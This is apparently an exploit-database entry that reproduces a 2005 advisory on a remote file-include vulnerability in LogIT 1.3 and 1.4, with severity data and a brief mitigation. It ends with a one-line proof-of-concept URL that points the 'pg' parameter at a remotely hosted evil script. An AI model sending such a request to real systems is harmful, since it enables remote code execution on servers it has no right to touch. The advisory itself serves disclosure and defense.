header-logo
Suggest Exploit
vendor:
LogIT
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: LogIT
Affected Version From: 1.3
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

LogIT Remote File Include Vulnerability

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16932/info

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.

Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. 

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

http://www.example.com/?pg=http://www.example2.com/evilcode

Navigation

Suggest Exploit

Services By CQR